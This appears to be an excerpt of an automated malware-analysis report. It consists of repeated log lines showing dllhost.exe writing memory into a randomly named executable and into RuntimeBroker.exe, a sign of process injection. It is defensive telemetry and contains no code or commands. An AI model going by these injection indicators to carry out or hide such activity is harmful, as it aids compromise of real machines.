Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2EA0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 15BA5ED0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2E50000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 27B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2EA0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 9D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2E50000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: B60000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 1580000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: B60000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2700000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 1580000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2F10000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2220000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 23C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2A10000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2A70000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2350000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 26F0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 10B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 10D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2F40000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2F60000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: CE0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: D00000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: BC0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: BE0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2E50000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2E70000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2F40000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2F60000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 11E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 1200000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 27E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2800000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 6B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 6D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 29D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 29F0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: FD0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2A60000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2510000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2530000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: B10000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 24D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2790000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 27B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2920000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2940000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2D80000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2EA0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 23D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 23F0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: BE0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: C10000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 25A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 25C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2FB0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 3140000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 21E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2200000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2400000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2420000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 23E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2400000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: FA0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2AE0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2220000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2280000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: A50000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: A70000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 25A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2840000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2E50000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2E70000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 21E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2200000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2A70000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2CC0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2780000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 27A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2E90000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2EB0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 1110000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2B20000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: BA0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: BC0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2120000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 21B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2490000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 26B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2960000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2A90000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2830000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2850000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2A30000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2A50000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 3000000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 3020000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2770000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2790000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: A70000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: A90000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2E50000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2E70000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2BC0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2BE0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 22F0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2310000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 25E0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2600000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2DC0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2DE0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2C10000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2D40000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 1530000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 1550000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 1220000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2CF0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2930000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2950000
